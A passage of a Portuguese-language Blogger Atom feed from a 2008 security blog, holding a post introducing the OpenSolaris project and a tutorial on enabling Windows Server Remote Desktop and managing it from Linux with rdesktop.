src='https://blogger.googleusercontent.com/tracker/7848027763758575661-9024335592074834230?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/9024335592074834230/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=9024335592074834230' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/9024335592074834230'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/9024335592074834230'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/06/especialistas-querem-usar-botnets-como.html' title='Especialistas querem usar botnets como meio de defesa'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-8222527824092236099</id><published>2008-05-30T09:23:00.001-07:00</published><updated>2008-05-30T09:24:47.712-07:00</updated><title type='text'>Apresentando o OpenSolaris</title><content type='html'>&lt;p&gt;Neste artigo apresento o Projeto OpenSolaris da Sun Microsystems. Vou trabalhar basicamente em três aspectos:&lt;/p&gt;  &lt;ol&gt;&lt;li&gt;Apresentanndo o OpenSolaris&lt;/li&gt;&lt;li&gt;Obtendo o DVD de instalação &lt;/li&gt;&lt;li&gt;Instalação básica do OpenSolaris.&lt;/li&gt;&lt;/ol&gt;  &lt;h4&gt;O que é o OpenSolaris&lt;/h4&gt;  &lt;p&gt;OpenSolaris é um projeto criado pela Sun Microsystems para criar uma comunidade de desenvolvedores em volta do sistema operacional Solaris. O projeto é baseado no código fonte do Solaris. Este projeto tem como base:&lt;/p&gt;  &lt;ul&gt;&lt;li&gt;Inovação&lt;/li&gt;&lt;li&gt;Colaboração &lt;/li&gt;&lt;li&gt;Extensão da tecnologia OpenSolaris&lt;/li&gt;&lt;/ul&gt;  &lt;h4&gt;Entendendo o OpenSolaris e o SO Solaris &lt;/h4&gt;  &lt;p&gt;O SO Solaris da SUN continua sendo o SO comercial. Versões futuras do Solaris serão baseadas nas novas tecnologias do projeto OpenSolaris. Entenda que o OpenSolaris é o código base para o desenvolvimento do Solaris.&lt;/p&gt;  &lt;p&gt;O projeto OpenSolaris consiste em:&lt;/p&gt;  &lt;ol&gt;&lt;li&gt;Disponibilizar o código fonte do OpenSolaris.&lt;/li&gt;&lt;li&gt;Comunidade de desenvolvedores&lt;/li&gt;&lt;li&gt;E um website para colaboração. O site é este em inglês &lt;a href="http://opensolaris.org/os/" class="ext"&gt;http://opensolaris.org/os/ &lt;/a&gt;- a versão em português está disponível em &lt;a href="http://br.opensolaris.org/" class="ext"&gt;http://br.opensolaris.org/&lt;/a&gt;&lt;/li&gt;&lt;/ol&gt;  &lt;p&gt;No site &lt;a href="http://br.opensolaris.org/" class="ext"&gt;http://br.opensolaris.org/&lt;/a&gt; é possível obter detalhes sobre este projeto que tem por objetivo ser um dos SO mais utilizados no mundo e ser um rival ao Linux. &lt;/p&gt;  &lt;p&gt;Fonte: &lt;a href="http://www.theinquirer.net/en/inquirer/news/2007/09/04/open-solaris-is-a--linux-killer" class="ext"&gt;http://www.theinquirer.net/en/inquirer/news/2007/09/04/open-solaris-is-a--linux-killer&lt;/a&gt;&lt;/p&gt;  &lt;h4&gt;Minhas impressões sobre o OpenSolaris&lt;/h4&gt;  &lt;p&gt;Bem, depois de dois meses de espera, finalmente chegaram os DVDs do OpenSolaris totalmente gratuito (mais detalhes no próximo artigo). A instalação foi bem simples igual a qualquer distro Linux. Se o usuário já sabe Linux no Modo Gráfico, não vai sentir dificuldades ao usar o OpenSolaris. Veja a ilustração:&lt;/p&gt;  &lt;img style="width: 365px; height: 248px;" src="http://conteudo.imasters.uol.com.br/7834/opensolaris1.jpg" alt="OpenSolaris" /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-8222527824092236099?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/8222527824092236099/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=8222527824092236099' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8222527824092236099'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/8222527824092236099'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/05/apresentando-o-opensolaris.html' title='Apresentando o OpenSolaris'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7848027763758575661.post-5939658057787891056</id><published>2008-05-30T09:19:00.000-07:00</published><updated>2008-05-30T09:25:15.210-07:00</updated><title type='text'>Gerenciando o Windows 2000/2003 a partir do Linux</title><content type='html'>&lt;h4&gt;Pré-requisitos&lt;/h4&gt;   &lt;p&gt;É necessário, para fazer os testes de forma prática, que você tenha alguma versão do Windows com o Terminal Services instalado. Também é necessário ter um computador com o Linux. &lt;/p&gt;  &lt;h4&gt;Definindo o Terminal Services &lt;/h4&gt;  &lt;p&gt;Vamos definir de forma simples o que é o TS (Terminal Services) - é um programa que permite o acesso remoto a um computador com o Windows. Por padrão, no Windows Server 2003, o Terminal Services já vem instalado e é necessário apenas habilitar esta opção. &lt;/p&gt;  &lt;p&gt;RDP - Remote Desktop Protocol - é o protocolo utilizado para a comunicação entre um computador cliente e um servidor com o Terminal Services instalado. &lt;/p&gt;  &lt;h3&gt;Habilitando o Acesso Remoto no Windows Server 2003 &lt;/h3&gt;  &lt;p&gt;   1. Acesse o servidor com um usuário com privilégios &lt;span class="c2"&gt;administrativos.&lt;/span&gt;&lt;/p&gt;    2. Clique no botão &lt;span class="c2"&gt;Start&lt;/span&gt;, depois em &lt;span class="c2"&gt;My Computer&lt;/span&gt; com o botão direito. &lt;p&gt;   3. Agora, clique em &lt;span class="c2"&gt;Remote.&lt;/span&gt;&lt;/p&gt;    4. Marque a opção &lt;span class="c2"&gt;Enable Remote Desktop on this computer.&lt;/span&gt; &lt;p&gt;   5. Agora, clique no botão &lt;span class="c2"&gt;Ok.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;      Veja a ilustração: &lt;/p&gt;  &lt;p&gt;&lt;img style="width: 356px; height: 407px;" src="http://conteudo.imasters.com.br/6537/Gerenciando%20o%20Windows%20a%20partir%20do%20Linux.doc.jpg" alt="" /&gt;&lt;/p&gt;  &lt;p&gt;É bem simples e, por default, apenas o usuário com privilégios administrativos (no caso o Administrator) tem estes "poderes". &lt;/p&gt;  &lt;h4&gt;Preparando o Linux para acessar o servidor Microsoft &lt;/h4&gt;  &lt;p&gt;Através do Linux, vamos acessar remotamente um servidor Linux. É bem simples todo o processo. O programa do Linux que vamos usar é o rdesktop. &lt;/p&gt;  &lt;h4&gt;Verificando se o rdesktop está instalado &lt;/h4&gt;  &lt;p&gt;1. Em distribuições baseadas em pacotes rpm, digite &lt;span class="c2"&gt;rpm -qa | grep rdesktop.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;      Caso não seja informado nada, é porque o pacote não está instalado. &lt;/p&gt;  &lt;p&gt;2. Acesse o local onde está o pacote rpm e digite &lt;span class="c2"&gt;rpm -ivh rdesktop-1.3.1-5.i386.rpm.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;      Veja a ilustração abaixo: &lt;/p&gt;  &lt;p&gt;&lt;img style="width: 489px; height: 240px;" src="http://conteudo.imasters.com.br/6537/Gerenciando%20o%20Windows%20a%20partir%20do%20Linux.doc2.jpg" alt="" /&gt;&lt;/p&gt;  &lt;p&gt;   3.  Repita a consulta digitando &lt;span class="c2"&gt;rpm -qa | grep rdesktop.&lt;/span&gt;&lt;/p&gt;  &lt;p&gt;Será exibida a consulta com o pacote já instalado. &lt;/p&gt;  &lt;h4&gt;Acessando o servidor Microsoft a partir do Linux&lt;/h4&gt;   &lt;p&gt;Agora sim, vamos conectar no servidor Windows a partir do Linux. É necessário que você esteja acessando o Linux a partir do Modo gráfico. &lt;/p&gt;  &lt;p&gt;   1. Acesse uma console no Linux&lt;/p&gt;  &lt;p&gt;Vamos acessar com a forma padrão inicialmente. &lt;/p&gt;  &lt;p&gt;   2. Digite rdesktop &lt;span class="c2"&gt;IP_DO_SERVIDOR&lt;/span&gt;.&lt;/p&gt;  &lt;p&gt;      Será exibida a seguinte tela:&lt;/p&gt;  &lt;p&gt;&lt;img style="width: 448px; height: 278px;" src="http://conteudo.imasters.com.br/6537/Gerenciando%20o%20Windows%20a%20partir%20do%20Linux.doc3.jpg" alt="" /&gt;&lt;/p&gt;  &lt;p&gt;   3.  No campo &lt;span class="c2"&gt;User name&lt;/span&gt;: informe um usuário com privilégios de acesso e no campo &lt;span class="c2"&gt;Password&lt;/span&gt;: digte a senha.&lt;/p&gt;  &lt;p&gt;Aguarde um pouco enquanto é feito o logon. Veja a ilustração: &lt;/p&gt;  &lt;p&gt;&lt;img style="width: 414px; height: 322px;" src="http://conteudo.imasters.com.br/6537/Gerenciando%20o%20Windows%20a%20partir%20do%20Linux.doc4.jpg" alt="" /&gt;&lt;/p&gt;  &lt;p&gt;   4.  Bem, a gerência do servidor Windows agora é com você.&lt;/p&gt;  &lt;h5&gt;Mais opções do rdesktop&lt;/h5&gt;   &lt;p&gt;      Informando a resolução:&lt;/p&gt; &lt;ul&gt;&lt;li&gt;&lt;span class="c2"&gt;rdesktop -g 1024x768 IP_DO_Servidor &lt;/span&gt;&lt;/li&gt;&lt;li&gt;Esta opção faz com que o servidor seja acessado com a resolução de 1024x768.&lt;/li&gt;&lt;li&gt;Bem, para gerenciar isto é o suficiente. &lt;/li&gt;&lt;/ul&gt;  &lt;h3&gt;Conclusão&lt;/h3&gt; &lt;p&gt;Aprendemos, de forma simples e objetiva, como gerenciar os servidores Microsoft através do protocolo RDP. O programa rdesktop tem várias opções como mapeamento de impressora, ativação do som, etc. Mas tentamos ser o mais prático e didático. &lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7848027763758575661-5939658057787891056?l=securityvv.blogspot.com'/&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://securityvv.blogspot.com/feeds/5939658057787891056/comments/default' title='Postar comentários'/><link rel='replies' type='text/html' href='https://www.blogger.com/comment.g?blogID=7848027763758575661&amp;postID=5939658057787891056' title='0 Comentários'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5939658057787891056'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7848027763758575661/posts/default/5939658057787891056'/><link rel='alternate' type='text/html' href='http://securityvv.blogspot.com/2008/05/gerenciando-o-windows-20002003-partir.html' title='Gerenciando o Windows 2000/2003 a partir do Linux'/><author><name>EvandroVV</name><uri>http://www.blogger.com/profile/12706285965300289371</uri><email>noreply@blogger.com</email><gd:extendedProperty xmlns:gd='http://schemas.google.com/g/2005' name='OpenSocialUserId' value='09130274822215892962'/></author><thr:total xmlns:thr='http://purl.org/syndication/thread/1.0'>0</thr:total></entry></feed>